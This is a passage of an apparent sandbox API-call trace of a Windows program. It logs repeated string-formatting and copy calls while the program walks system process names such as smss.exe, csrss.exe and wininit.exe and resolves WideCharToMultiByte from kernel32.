param_2="%d" | out: param_1="1024") returned 4 [0158.390] lstrcpynA (in: lpString1=0x3405e8, lpString2="System", iMaxLength=1024 | out: lpString1="System") returned="System" [0158.390] lstrcpyA (in: lpString1=0x431400, lpString2="System" | out: lpString1="System") returned="System" [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="-1") returned 2 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3303080") returned 7 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.391] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="7") returned 1 [0158.391] lstrcpyA (in: lpString1=0x430000, lpString2="7" | out: lpString1="7") returned="7" [0158.391] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.391] wsprintfA (in: 
param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.391] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.391] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.392] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.392] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.392] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.392] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3303096") returned 7 [0158.392] lstrcpyA (in: lpString1=0x33e508, lpString2="3303096" | out: lpString1="3303096") returned="3303096" [0158.392] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.392] wsprintfA (in: param_1=0x33fdd8, 
param_2="%d" | out: param_1="264") returned 3 [0158.392] lstrcpyA (in: lpString1=0x431800, lpString2="264" | out: lpString1="264") returned="264" [0158.392] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.392] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3303408") returned 7 [0158.393] lstrcpyA (in: lpString1=0x430800, lpString2="3303408" | out: lpString1="3303408") returned="3303408" [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="336") returned 3 [0158.393] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.393] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3303096") returned 7 [0158.393] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.393] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.393] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.393] lstrcpynA (in: lpString1=0x3401e0, lpString2="smss.exe", iMaxLength=1024 | out: 
lpString1="smss.exe") returned="smss.exe" [0158.393] lstrcpyA (in: lpString1=0x431400, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="-1") returned 2 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3303408") returned 7 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.393] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="9") returned 1 [0158.393] lstrcpyA (in: lpString1=0x430000, lpString2="9" | out: lpString1="9") returned="9" [0158.393] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.393] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.393] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: 
param_1="7") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.394] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.394] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.395] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.395] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.395] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.395] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.395] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3303432") returned 7 [0158.395] lstrcpyA (in: lpString1=0x33e508, lpString2="3303432" | out: lpString1="3303432") returned="3303432" [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="332") returned 3 [0158.395] lstrcpyA (in: lpString1=0x431800, lpString2="332" | out: lpString1="332") 
returned="332" [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3304192") returned 7 [0158.395] lstrcpyA (in: lpString1=0x430800, lpString2="3304192" | out: lpString1="3304192") returned="3304192" [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.395] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="784") returned 3 [0158.396] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.396] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3303432") returned 7 [0158.396] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.396] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.396] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="1024") returned 4 [0158.396] lstrcpynA (in: lpString1=0x33fdd8, lpString2="csrss.exe", iMaxLength=1024 | out: lpString1="csrss.exe") returned="csrss.exe" [0158.396] lstrcpyA (in: lpString1=0x431400, lpString2="csrss.exe" | out: lpString1="csrss.exe") 
returned="csrss.exe" [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="-1") returned 2 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3304192") returned 7 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.396] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="10") returned 2 [0158.396] lstrcpyA (in: lpString1=0x430000, lpString2="10" | out: lpString1="10") returned="10" [0158.396] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.396] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.396] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: 
param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.397] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.397] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.398] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.398] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.398] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.398] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3304216") returned 7 [0158.398] lstrcpyA (in: lpString1=0x33e508, lpString2="3304216" | out: lpString1="3304216") returned="3304216" [0158.398] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.398] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="380") returned 3 [0158.398] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: 
param_1=0x3409f0, param_2="%d" | out: param_1="3304592") returned 7 [0158.399] lstrcpyA (in: lpString1=0x430800, lpString2="3304592" | out: lpString1="3304592") returned="3304592" [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="400") returned 3 [0158.399] lstrcpyA (in: lpString1=0x431000, lpString2="400" | out: lpString1="400") returned="400" [0158.399] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3304216") returned 7 [0158.399] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.399] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.399] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.399] lstrcpynA (in: lpString1=0x341200, lpString2="wininit.exe", iMaxLength=1024 | out: lpString1="wininit.exe") returned="wininit.exe" [0158.399] lstrcpyA (in: lpString1=0x431400, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="-1") returned 2 
[0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3304592") returned 7 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.399] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="12") returned 2 [0158.399] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.399] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.399] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, 
param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.400] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.400] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.401] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.401] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.401] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.401] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.401] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.401] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3304616") returned 7 [0158.401] lstrcpyA (in: lpString1=0x33e508, lpString2="3304616" | out: lpString1="3304616") returned="3304616" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="392") returned 3 [0158.401] lstrcpyA (in: lpString1=0x431800, lpString2="392" | out: lpString1="392") returned="392" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3305376") returned 7 [0158.401] lstrcpyA (in: lpString1=0x430800, 
lpString2="3305376" | out: lpString1="3305376") returned="3305376" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="784") returned 3 [0158.401] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.401] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3304616") returned 7 [0158.401] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.401] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.401] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="1024") returned 4 [0158.402] lstrcpynA (in: lpString1=0x3409f0, lpString2="csrss.exe", iMaxLength=1024 | out: lpString1="csrss.exe") returned="csrss.exe" [0158.402] lstrcpyA (in: lpString1=0x431400, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="-1") returned 2 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3305376") returned 7 [0158.402] wsprintfA (in: 
param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.402] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="10") returned 2 [0158.402] lstrcpyA (in: lpString1=0x430000, lpString2="10" | out: lpString1="10") returned="10" [0158.402] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.402] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.402] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") 
returned 1 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.403] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.403] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.403] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.403] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3305400") returned 7 [0158.404] lstrcpyA (in: lpString1=0x33e508, lpString2="3305400" | out: lpString1="3305400") returned="3305400" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="432") returned 3 [0158.404] lstrcpyA (in: lpString1=0x431800, lpString2="432" | out: lpString1="432") returned="432" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3305840") returned 7 [0158.404] lstrcpyA (in: lpString1=0x430800, lpString2="3305840" | out: lpString1="3305840") returned="3305840" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | 
out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="472") returned 3 [0158.404] lstrcpyA (in: lpString1=0x431000, lpString2="472" | out: lpString1="472") returned="472" [0158.404] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3305400") returned 7 [0158.404] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.404] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.404] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.404] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 